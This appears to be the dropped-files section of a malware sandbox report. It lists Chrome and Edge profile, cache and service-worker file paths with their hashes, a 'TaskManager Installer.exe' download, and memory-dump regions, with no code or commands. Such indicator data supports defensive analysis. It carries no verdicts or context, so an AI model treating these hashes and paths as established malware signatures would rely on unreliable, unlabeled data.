SHA256 1150ea0fa5eb2b77fd678a841dff24a17fe74f73962285b431edc023dbecf18b
SHA512 9991435944822db52eb51fad0e0c2c47bcbfd1415f2963342ac9bd05c45a5aba512ecb66af3d8f9511a37bb19770150f29adeeefc1c856aa499f2117c4f84e65

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e6b48c4a973a86758617334952547084
SHA1 6bbb8360066ca9da23760f310b0c817736fb757a
SHA256 1e06ce801645581ca030e26fdab8dd6f8e89dfd258f7f2c15a08980d5363f827
SHA512 91e83c79c5c3277b5f310fda877f984923e4c5b266af3190b374e70030795c0f601bd280880678c05ef90bf3a6f25633c5deb2a6cb472244ed6ed855611de3aa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 acf9fcf434a5f24092126b4f652dfb5f
SHA1 0f5c5bface03f27deb386329eb9f57300e3589d0
SHA256 4e7525cfb328fdb9263a34f39383d847097d484da8a37fecad288cfdedbe1de7
SHA512 90a017344f6242cf3a8e89032f9451f0a5ac2039ff55bc6563d479b5e32125f22ae1c4bc8d67c90e9ebbf7d13d2a76e10e96ab561b7258fcba0d2682f036862d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a8a7f36cae00feb66f0a4f0856bd351a
SHA1 25e979c1d0fbef8b3fd7d13f3e44d6de1c670c50
SHA256 d41c518fd48070cf035e54445048a70bdae90899fc7abcffc8b145fd009f4438
SHA512 e4851c58bfeac9d9622b16baed3b0bfa541b9392d0f1cdb8f68eb114744940215e06a44cabfd18b288a0db8a7d1faf7be57423f3c48a9c35fe9404c8b6032afd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 b31ef4beb5ed49e38ce60cfa7a566656
SHA1 75cbe5a8e0ad4835cf394a775c87b961838d451c
SHA256 51d106e1e37732cad47c03cd05f27d5fb401dceb021b9248e060f940cd1972d8
SHA512 0bd2d6738dc1b69178e4c76a62caf879ac7ce1c76703db85bdb7da84b08e89d509f15bf4eb82fb55035fbc8d08986a0760b621d710814c3ece0fed6302fbe6df

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt~RFe6386d9.TMP

MD5 9ce68a95e57f59516eb745f240488ec8
SHA1 38031a7df8411830716cc079f9c5142a689ddf10
SHA256 8af15ff0aff70e579f3aae5b938e0b4358ad082a9ff9174d4ae7c246f73edd78
SHA512 36983dcb96b6e6704b0473abf44a7c80c1416f5f82c3e5a2ef7c684ff78e7aedb0e6e1e8d591ab25ee416227ad47c9b9397452ed15cc2064c3a0f7bc56ccdf4f

C:\Users\Admin\Downloads\TaskManager Installer.exe

MD5 840831afd81146be71baa6428973bda1
SHA1 44301c4cec9858b031df8ebe14985f0e5ebb4c8b
SHA256 83f25840d734d52dcb961085e9e4e0ff076705c993f66f7c06a9740b3ff5d8bb
SHA512 a6dd1cf16639b869eb5e1de4c632d6eaf2b1e480c742f143df855ea19bf6db1a0e44b1803ac14fc312701cf9dea528be2f508b262bd7e14a337c6580acced311

memory/5860-1755-0x000001F7F0EB0000-0x000001F7F0FBA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8e74b90d3d1056bd59c2d7ca73cd90e4
SHA1 a87742095cd35ce934c482ae46d71f35dc924094
SHA256 6ba5748bcab2cd018284a87cda64048e04a0702e96b716a4fcae285ecd19c6c7
SHA512 06d6d65cc4f5a61490d265c48139efb4a21dbd0c4baaf7784a492791358d39a18457707e5ebf551d478dc78c17c15bc92f590b85b959a33f5b8c302414a86a8e

memory/5860-1765-0x000001F7F14E0000-0x000001F7F14EA000-memory.dmp

memory/5860-1766-0x000001F7F3F60000-0x000001F7F401A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpAF31.tmp

MD5 a10f31fa140f2608ff150125f3687920
SHA1 ec411cc7005aaa8e3775cf105fcd4e1239f8ed4b
SHA256 28c871238311d40287c51dc09aee6510cac5306329981777071600b1112286c6
SHA512 cf915fb34cd5ecfbd6b25171d6e0d3d09af2597edf29f9f24fa474685d4c5ec9bc742ade9f29abac457dd645ee955b1914a635c90af77c519d2ada895e7ecf12

memory/5860-1779-0x000001F7F2F60000-0x000001F7F2F72000-memory.dmp

memory/5860-1780-0x000001F7F3EE0000-0x000001F7F3F1C000-memory.dmp

memory/5860-1783-0x000001F7F42F0000-0x000001F7F42FE000-memory.dmp

memory/5860-1784-0x000001F7F6530000-0x000001F7F6556000-memory.dmp

memory/5860-1781-0x000001F7F3EC0000-0x000001F7F3EC8000-memory.dmp

memory/5860-1782-0x000001F7F64F0000-0x000001F7F6528000-memory.dmp

memory/5860-1785-0x000001F7F6A20000-0x000001F7F6A28000-memory.dmp

memory/5860-1786-0x000001F7F6F70000-0x000001F7F70F8000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 aea6c4030ba15b7fec406187879c291d
SHA1 db6fcc8ced7efb5a02fa53c4be875f730572054c
SHA256 42beba8b1551dfa14ce3619639b561edbf09c16468d7ca7e552e4956ffa13dc0
SHA512 82b4c59e5f93f014cef94f918a6330d45482a281380f684b9db83fb5d31671dcb9f2b5a856de119f33c01799de13f95fc3f1685909ebd83e6495c80d9a3850a6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\43086051-6c7c-41af-a694-2d52f3ea6a46\index-dir\the-real-index~RFe63d518.TMP

MD5 2f753ae5bdb46edfe8fa07cb8cc5efa4
SHA1 5e4bde17435f67a067665f0cf6d0b4bdddc8a531
SHA256 29162715c8c320f6154ba14a923a3319840c6dcea678b4f32f864314c26a1ccb
SHA512 f5bbcf31db062d3894dca2c0b31f12624bba390c2098a55432222da22f6cac10d9e66544fc66e64ec4f3f8f4e1c90576e81bf14aefef04717b3737501b6229bc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\43086051-6c7c-41af-a694-2d52f3ea6a46\index-dir\the-real-index

MD5 495dd1b6aeddac8f770bc2d9155f4aa2
SHA1 7ad28acc50aee3ce98a8fa37fafc07d20612de61
SHA256 bba6f8a59e0ef8346897905e0a4f13722f6b21e035c6ecf9186b66ef66b446a5
SHA512 f76fb79a9ff6da1c94191defc02ad5053f2570db83d2863b72c864ff2830b018f8dee0ef10d3edd2ecf500fa62e60dfdcbf236acd5c538cc1420bddf573ce95c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a210eda45a3153e0db7f1c65143559d5
SHA1 77d87e32460c11bd8989b125771a4361f48c7d4b
SHA256 6554e597a1bd89cc538e60625ab7565490f7ec9115a6feffc539682500ea4c77
SHA512 988707b43061f99f8660f253cf8132cd0008c027a5b08d78123b4dde809d63aa447d0f0a711bc36becdaa6bb5f111201cd91bd7845a42f2f2a3b173d7e3b76db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e5f3655796637b7d0f4a8ed402e119ea
SHA1 3baaf516676664d46727759914745776a166016a
SHA256 22d91a4321390a9445110f04d5600f49f03604a2d7ecadd10c663248295c88dd
SHA512 2125899d678c926c9f85ad81892f8ee91aa0a74e4c533bcb6e48675ebf0eccbe0db17998f3e3ab961cf3beb8fef7f950588398c5868327aa2d33f81bde797ebe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\08c2bbc5-137a-4d4b-a735-20158db3c934\index-dir\the-real-index~RFe63e14d.TMP

MD5 48cb792d6fdb160c5e8c03b408819f73
SHA1 0628358e00b3def6db71252e79f9955e42ef277c
SHA256 633ae55d8df3980f025695f8f88c2e4e8199540041099cb00f4073a4d5121ffe
SHA512 57869f909b79105d6e21b2b0fc79d7680dc32eebe4b261db575e0a1f4ba85913812fa2a82fba023bec94a931e331f2661171495f1dc4bba1d3fe856246834181

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\08c2bbc5-137a-4d4b-a735-20158db3c934\index-dir\the-real-index

MD5 702cf21fcf9b4caac731af7c2a918a7a
SHA1 5fa8f336ea975324d90f52aa5cfc68d3ea31a922
SHA256 2dc7ad71a5a5c207087338238db6c9f4ac67b5acf80e5849ffe4daa259153160
SHA512 9f68bb7670743cfaaaf545f16cc6aba63571429066e09cad6eb0a65938c14eec1aab0a0fe3e3ee39e2fbfed2f1906d0c70caff95c22855a230c34dc3738e7d78

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 c17c48ad84122179b7c8b0d178345774
SHA1 f84c4aa743932b0e8c07bd8a86247e41d4c3c53f
SHA256 2f8738dbe4e3b75ceadd7bc0bb4a35796dd5305ff470c99d6f6c4030b2d644ae
SHA512 b79e6ed3385f4dc9b054065bfbec68af82f2270bf6d8b3c8299b29ad6ab83986615b90a89eadfbd02be86d7735ab643e42916ff826c3ac1c93b19724edb55d12

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 b1803c056049195def518717b8ab8dde
SHA1 9d1b5f30726dbc8cba49e0030c06a46b7774dff1
SHA256 c37c9a89942bba44d9260f4816eab51ef0d4d80b0aada4815ca484365f52f7e3
SHA512 69da98f74afa1eb196842e74abeaeb5924a880c63e0c05f55da863ac95b242717aa511a77b71dd8de2f17692bd7c1b560c88ef2a945c853ba7c35acdda48526f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 1c9ebcbcab30ec4efc3df2d39794cf6a
SHA1 d1df96f6e610091d86e2ad896ffc176738c7282b
SHA256 fb2801bf4e4b8935f6ff1b467997fd790baab313c2bf10c99fb36ca8cbb5aaed
SHA512 ad7719ef51d49357d19f9e7fb35d1ffa1e2f3146cb91e039d6503c8a9a3f00f83e0c963255a1b43fae3db152cd8f655efd5b685425cfcbaaeb55a60b1fa22fb1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 40e2018187b61af5be8caf035fb72882
SHA1 72a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256 b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512 a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000064

MD5 56863cc31a60454797698b3699063ef1
SHA1 6a5e2cae55e36cae7469473e487d46beef62e578
SHA256 6c81f876a1101df23837a69eaeddf794e706791b28ec9fbe559fab3095da8dee
SHA512 70164f9d3f9fb749db946d8503ca38bd9e7d80ebb2550da5c862b9fa29074b0aef0fe4474d1fbd415dab98d91e885ad0a6def6e6518a2aa7a68b9c3f826b7a26

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000065

MD5 aae13593aaee2b62f46b6e7cb745ea99
SHA1 44085738af7507617f8e6cd15a93db8b99fe02a6
SHA256 3d043a1a1ac206e58b02a666191c9b14f8693c1ce10676899d64239a2f2053a5
SHA512 0c545e44ef4d40e4ca3bc6dd470dae4a584a7e61a5aaa6381e7be8443fd4e6662a5734d54028c5b7d8305a5e306e50853f78c725978d143bff95422e97588864

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000066

MD5 0cf7e746fee0ee075963366a8c4f9862
SHA1 92344e978437b3d787cd046167c8a55a1c40dc7f
SHA256 75f71ace5d7056bfff6b506cf401d9cd8120e3ba111f85446cdea260e4c15f4f
SHA512 4c472d92514123b8d95891ef830d7c16eef56d5fc3853e0f094a02dfa50727c982b35b88266a23fec7e1d9862d2a0fbce7128589547c82844dd0b7a8be62ccd2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000068

MD5 c7529a61b7630daba2b86608315d7c06
SHA1 a6de77d8e02106cc2f22356319f42d3ac99fd05c
SHA256 e7b5ff064e86f47266db141a368b1d9613d7b027c23b7eba4ca1b760e9da7fc1
SHA512 28252cc288936f2a0ab368ccd0cd63a00dcdacbb72a32dfdf89003ff2d381017e4859934c9ab64f40e46bd5271390f51de97fc531af07dcdb67672dd6c90a4fc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006a

MD5 eadeafd9ee32b581fd2cd2423711e27a
SHA1 cdc6063bbb4c4cc2c375695a5d7efb27ca525813
SHA256 6fc57adcbf846388a26d46c4d5287ad030e118840bb2389dd23493c4eaba0a12
SHA512 f3ddea7116b5185fbc65ba1892f5fddf630b242312399bdf1017db5acbbf40fc27c9680eaf36e30d33e0630ee37f7ba9ef894d0223b71d03701eb55ff4e744b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000069

MD5 9a389a7d291707098cf8a8a37b861d91
SHA1 4d87b991024f37f8df2a53a474156a159ae49d2c
SHA256 84a02547ba584e05537efa31130cab9c83d8e422bdb767c21746a7a8b8c3d751
SHA512 7e4d7d3f76720fdbccfd34c8b21d5997c778ba1457d09d5a4fed4387c3d65fbc662d40af8f6cfa8e5f7d65b7961c823ff5a68a19efbc0f821fcc9e1dfaa7a66c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000067

MD5 e64e5f2ddf5a4e9125717b57a66521bc
SHA1 fbb5b8d0a33055a713fa5081083ae7fec586c5be
SHA256 d1b95fc071d30d359598ceb55a2db2ddc123d813f860110347c6eb44c9b39ebc
SHA512 914a5e7f7e55fc05067a766439e9bb29120c1b3bd503f735bbce61c42d779f1352e0c97dc7f858da2f23b58073a35673415d78fbb5dcb263dde2c4d699631aeb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 a732001b6f140d1f8a2590ea5b613f23
SHA1 318365fa0285ba8026bd21537f4c2d511bfd5134
SHA256 84191aab45e31fb17475b13e94d058501a07786abaf3753582d98e0c8ac03baf
SHA512 2fc1aba7477608f1443706b48325d5080f1b96e2aeb32351a3c44e479af61006d6c39994a5e93ad1f25f0a93adea42505547e3fc4fcdfc385d04865782c44d12

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt~RFe63fa25.TMP

MD5 7b03a5feab7d2008fdd4613651ad9d8f
SHA1 881846ba0d5e794fbf96b2c3dde51ee74ffc2633
SHA256 b7c2b87fcd91904ee23235578994671e87c70f9df3a68f75386cd9b66e15fb53
SHA512 4d026c2bd78cbbf99e52fc7766186e1d0338172e70375de49d6d95938ca7e57751d15787b7935293cbbb335ec7030ebf7a92fe7aa68cfa568c895ded56afd660

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 051b58b0651ba363f02f1fefba3128ec
SHA1 567b3ee0b60388367ffc0759652973d45038d11f
SHA256 49f98f8d65abc8ae966a23ad631b00b9e31fc68c59e67116060314a803d3c316
SHA512 392f3400ea0f2b3b943282d3991f4b03cc336e29f97f435068aa9ac11254a9165cebf35174fc38a8346499c3cf5c6c0d5e81c08dcc20d96caa335eed90a40a23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f203d55c501809975ba507f972d138df
SHA1 bb1f235d2af9286a3bcc9e125d0b50204e2c7797
SHA256 758d11748eea7cac3c2057bee7bd09839282c25a30c248ec676380abbbfb3ada
SHA512 0afc510743013ee04bd232f5e50968d748e07e23754a5cd17b7e4893d9ff3a873fb0321674824d5ba27cff7902cd50f34fdfc54c040b0190b3027677b9436fd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e687c4ad5b45918290dc016791fcb891
SHA1 112f6ee0c7fc148f664e5cbdedbf545e9b1a5791
SHA256 10a51372594ab1ae0803ea399a2516b2438d4e28a904d5ef5292b9caa6cc34b4
SHA512 c0936bec69483ed3a3e8031bcd9e6b3ad2dc54c96b7ead1e97fc8c32502b5fcc92d91c6172e951913f8e7c678014a19725dfc21b6b03048bede4cc813b552028

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 611d9f4b2d41c3a63ea09dec0529075e
SHA1 b79084f2c80d121a0c76fe3abf18f703c0222176
SHA256 73bb336c148c8e5e91f6669b1fbaf005e5633a28ff250ad4a0368dffc4c3fe85
SHA512 e0cad26ddc79779382bd848c5a8dfdea0bc1ffa1e96fc9baabb60409f03e44c2e682aa16597f4a8ad9b789999f2a2bad1f9948f63d6c86063d6da595560991a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 fa0a5d534c651698ee3c63d376f42ce4
SHA1 28f4b1cfc2439dd91ad097b5e9fe78f3e9b17581
SHA256 8f1ae6cd778174504de8d3c2fed15cdee2bad9342431db6ddb5e18bc8879ad29
SHA512 b1d070422d6e43fb5cb8ddaef257c52ed995d2bf18c55b193c6963b2cd3a3a9f4c0c7ccabc69612fd99136680ef744f6c7fcc6bfbec1a4bfadb940f4d050b02e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\809a9023-5c06-4b20-8fb9-c9c2e3d7083a\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bcaef69b1e9be33fc0d391643cc86438
SHA1 e293e2b01c81455f876b3d48c2bb7bad3f07fc37
SHA256 76c296a4926797861d12c4cf05f53e020e86f1c5801385dfeeef98bc5badb5cd
SHA512 ad10827519fdec867dc8922ed9afde0b4a96540803c0abe79c1f8360422866fd9a1c70c9e1b3fdd875cd09b65bacbb0961f860a419086374ff0c51fd10e663be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6a0c5f01d22a2f62630a79471cd70f4b
SHA1 3e946a5e1276fa168cd657e1e2c257fe4de168ba
SHA256 8b8aad5c8b1df392f1df92d8253121ae9c4b1b5b1401af2cf8469c8c23c84220
SHA512 203939c00cefe4e40b9e2c794df52ecfd8c8bd27beaa1cd7081c6f9f0db5d1d7f8a37db135ac29c79a0b44bba3ddfe3d8e8f3cbab505d0577d39dc9fe5acf896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 b35c785e962321a545b0e51477ee844e
SHA1 e9ee7843bf975d99924fd9fd280c0eeda945ffa0
SHA256 6ca2f312b9c9a8a61c1719edf8e6d55bb1720787185889d19f750e319fac1386
SHA512 3df74ae79b59035c34d267e383c8f493ec3e0c0c4b02dbd98966391855c2c09aca4bff4eab7f3a2e3d014586d637af84716cd212d019da07f7a7703eb40c1c84

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\b07a483d6652cafd_0

MD5 2f893d572bfe29c8da579485c0837181
SHA1 625a1524de23039544492cb5079ed3bf6a66051e
SHA256 9f1897f26dba815e92eba698575237ad05bb78a7c26e564ea237888ad6a7e04b
SHA512 f8270f58aa2393ce8d49fd6ddf8cef3bff07017a003d59ceff0995c6256b504a42befb5d2711b868163bf9c80fc5ec60d29fff87f5a7afce0bf96d3bf513f032

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006b

MD5 9b539bb03720cea32dcd38400410f84c
SHA1 d5fc52b9873ede9f90a30090cd5e2b5b24274ece
SHA256 66d8210272aacdd21c75cc9c1658ddf5c26cb36812e4ef32fbb612be904276c2
SHA512 0acfbd78eb9f33a98b7bf331c59986f7fd9077c976b2069c73d3453e222c568f26ff750ead161efe66f01baa3441a4d2fd7a65922f6b4a218d93778075561d14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\03ee873af60c39e1_0

MD5 b352eb14a530e855ced695fb78ded0a2
SHA1 e557ab5ea88c4133b1a09a659f9809ab4ee45c57
SHA256 59edff1671e4cb49baaaf13be6c83ecde5b7a53ea4572003cc4f458a83acf69c
SHA512 4e5c6273b32086b6860c3da99657ac67326ba7c2285ff6a995389030ed26ea003761c68b36a521e16a4be2d03b2d887808c75a8f5084257375acb4f8b2c2caf7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\2636681ffd1d4506_0

MD5 42afa7ebb08a7bf988f502748ad39e37
SHA1 b2d245eabf90585b02da52407658d2d796d8d011
SHA256 403622337ab41e57f7e98d659b925679b6c37de05fa56fc3c95c3698bc423a56
SHA512 29f5e4f302c33ccba324db25228778063a97bc17e9381f824b982ea64db93010629a01ca9611888b002ea43eab7a81b89643bed820228bbbbdcf528017ab395f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 552e0e8404be5356f713a2fa383dcf8d
SHA1 52688429159bf7c7c1fda097d79838ddf04a4c4e
SHA256 84b92d3e9776bc0ae49601b4310bbeecc5480f18ecda416d2ebd851e74aa1304
SHA512 fa3f4a570a378fbe323556367a442f4459005a8eb54237b284eadf9bd3832acb8a5f931fb6e3be64f807884c00a1312fc03f4afd4f8c1cfe575ea48a841cc1bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\LOG

MD5 8e177bd66e55174c66505946f81c3d69
SHA1 08911cdb3508796712e56be0a335b32f81b57cee
SHA256 e00379ec30ccfa0e0db8c8f462f19e0d3d02dc15bd2e4cd47bb96099d8263653
SHA512 ca84ee6bb07234ab1e87bd481d17602ba06c88e710a60f8570131329b4cddf51388efbd6dae5f4f0f233db84cb68548354816ebdb9609b3b371abfe014b98c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\000003.log

MD5 aba994bee829211e8e257d5a0f32f679
SHA1 ac3ab8c44772183445ddbaf7f4577d8a8773c9c2
SHA256 8543f2fb435bc05e8a1d592215b9edb3147e5b2e68229de52776d7279337f0d8
SHA512 2dda0cee6ff9287dee6194f7ab2ad357d2dafbae7aa94ac5caf6248e597b52afae7466b77c1074be6a065aed4cb5a921bd1cd3025ded6dad9ac01266a822810f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\9164997e0e4a026d_0

MD5 fd628f4153e88f08968816ab98942064
SHA1 2d975346a9509f5b0449f11d5dad8a15ba76b46b
SHA256 7ea5d2de4606045054f7dfe9dd23034767a958a243c8d985b224ff8238c7a50d
SHA512 8dd529840d1a0fecec7c5aaf23cef7e504412b5c4a724ea6fdbbad0c5f9424f9f29f6b6210050c2adbfb114e389582c2f5edb664bc95375799f6d2538bfb95a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\0b0a3ce1a915cb26_0

MD5 d74cd4afebc3cee020f210a04c5c05c4
SHA1 5a5c62b1f07b784b01301451a07b2e13b1b307fa
SHA256 287c2040ed7e4fb1e17cd90a8897102b1e96a489dd94b8d89e996fe5b08c4750
SHA512 62d0c6107f9907a6ec822dfc1855f36f1ea4a1a8d2fa8c3fd8b0df1f6b7065879a020b96c0f2532747ddff4eeaab542fef1da3257873e1f2104ef6061c720781

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\a590447832c6a057_0

MD5 d5dce927ef3299e20eded4306d379d22
SHA1 e51b5cc41f351b8c46431d5b55e2280b2c2cd299
SHA256 814c888fd966641a31f72aabd79dc120ad8afc09a7954de91592b4290059ef99
SHA512 3f562c301958c0c22a86e3722162699c2d68f7a2b1214be457ffb339f1241c302f87eeb3817a945ea9bb5ae66a5b1ea193139a07bd6535f72fcabeebc5ce5712

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 5681c18f7adc59144d8b92d628a2a9c3
SHA1 3b956cbeaf860a00e7c3c7851847898680fe206c
SHA256 fbb4d938331f38ba2819b763b47dcf3d62a5bf578d52c528243d77e305a98753
SHA512 346dd036271026631d768bdde28ef95e5a4c9330ebc5782e6a4aa1c6703c7d40af8752958b8ee226ab54b1f8569bf4fb37b45a23d6215229ce9836016c3fc012

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\81362bc903e9463a_0

MD5 f5c1d686318ada2528910f8260ce74c9
SHA1 39ac82bf32fcfc83f9753ba78c7b45086508b864
SHA256 c1079268ccfc3c0c90a89c90f0fe5d5301834f3f98c4eb732755fd09d9856205
SHA512 df6374ec6a124fd230ae16f9385ccf3ce61b40280ed5deeb4d6d3507387d3ee433986f7b545e3220d4a7297bff289f28d62b6fa1df7a643c29ae8365e1fcd0a6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\4098367b0ca261d3_0

MD5 dd791e77489bebf497a97fa194953e09
SHA1 b863dfcfe9122a4e0686a8c90ef89955647142a9
SHA256 52d91fa21e254ceebb4e86cb05feda9a92c2620223e5da6631bcd4e6c59a37a7
SHA512 0b80c23617c4eb8482e651d8644f0b774d0a68ec4f676e8a47acdcd1f93b842679da477b818f3bb22054b289674b9f5bb1d7d2c056dbe083eba0847c76b1a123

